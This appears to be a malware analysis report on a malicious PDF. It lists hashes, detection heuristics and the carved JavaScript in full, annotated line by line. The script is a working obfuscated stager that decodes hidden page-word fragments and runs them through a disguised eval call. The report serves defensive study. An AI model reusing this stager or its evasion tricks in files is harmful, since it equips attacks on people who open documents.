Malicious PDF — malware analysis report

Static analysis result for SHA-256 873b9be7780e8696…

MALICIOUS

PDF

Size: 5.6 KB · Authoring application: Jidagelageno (via 2b715Ylojoppekaxopqi) · First seen: 2013-02-25
MD5: 8dd4e23deaa961dd6a9112d99415401e
SHA-1: 9f02586494d38a46dbefb3759f71bf98a237c441
SHA-256: 873b9be7780e869663027504262f91157c1ca1cb307f0e35e3986a232b5e8016
Risk Score: 86

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • Page-word XOR JavaScript eval stager — severity: high — rule ID: PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action — severity: low — 1 related finding — rule ID: PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream — severity: low — rule ID: PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0xF52 | 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
// Empty string; reused below as the replacement text in the replace() call on
// xQN (and the stage-2 source itself re-declares rM='' as a join separator).
var rM='';
// "length" assembled from fragments so the whole literal never appears in the
// stream. Nothing else in this listing reads n — apparently a decoy.
var n=String("leng"+"th");
// Decoy helper: assigns an implicit global (jQ), bumps this.lG and returns the
// concatenation of its two arguments. No call site exists in this listing, so
// its only apparent purpose is padding the script.
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
// Character class of the six decoy characters (q 4 $ 9 L R) that were sprinkled
// through the stage-2 source held in xQN. The /g flag makes replace() remove
// every occurrence, not just the first.
var yL=/[q4\$9LR]/g;
// "prototype", split into fragments; not referenced anywhere in this listing.
var lS="pro"+"tot"+"ype";
// A String object whose value is "eval". It is used as a computed property
// name in hE(), so the call is spelled obj[yR](...) and no literal eval( token
// appears in the stream — a string-split/computed-member evasion that a
// detection rule should account for.
var yR=new String("eva"+"l");
// "replace", split the same way; used as a computed method name on xQN below.
var cZ="rep"+"lac"+"e";
// Stage-2 source with decoy characters from the yL class inserted throughout.
// Once cleaned it is the page-word XOR/eval stager the report scores under
// PDF_PAGE_WORD_XOR_EVAL_STAGER: it walks the document's rendered words via
// getPageNumWords/getPageNthWord, XOR-decodes the collected fragments and
// passes the result to app.eval. The entire body sits inside
// try { ... } catch(fE){}, so any runtime failure is swallowed silently (the
// empty catch is itself a useful signature trait). Preserved byte-for-byte as
// carved; altering the literal changes the artifact's hash.
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


// Strip the decoy characters: equivalent to xQN.replace(/[q4$9LR]/g, '').
// After this line xQN holds the runnable stage-2 source.
xQN=xQN[cZ](yL, rM);

// Capture the script's top-level `this`. NOTE(review): in Acrobat this is
// presumably the Doc object — the stage-2 source calls getPageNumWords on it —
// confirm in a sandbox rather than assume.
var rG=this;
// Dead arithmetic on an implicit global; padding only.
cH=5603;cH++;
// Launcher constructor. It stores the object passed as kF on the new instance
// (as uL and j) and then executes kF[yR](rY); since yR coerces to "eval", this
// is kF.eval(rY) — the cleaned stage-2 source in rY is evaluated in the
// context of kF. The local objects/arrays/booleans (lWX, pE, rQ, uLWX, bA,
// rAZ, oTI) are never read; they pad the single live statement at the end.
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
// Padding: properties and arrays that nothing in this listing reads.
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
// The stage-2 source in xQN also contains its own kN=q0 (kN=0 once the decoy
// characters are stripped), so this declaration appears to be padding as well.
var kN=0;
;


// Trigger: builds hE with the captured `this` (rG) and the cleaned stage-2
// source (xQN), which performs the eval. This is the only line in the tail of
// the script with an observable effect; the surrounding statements are noise.
var bCD=new hE(rG,xQN);
// More dead arithmetic on implicit globals and an empty object literal.
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;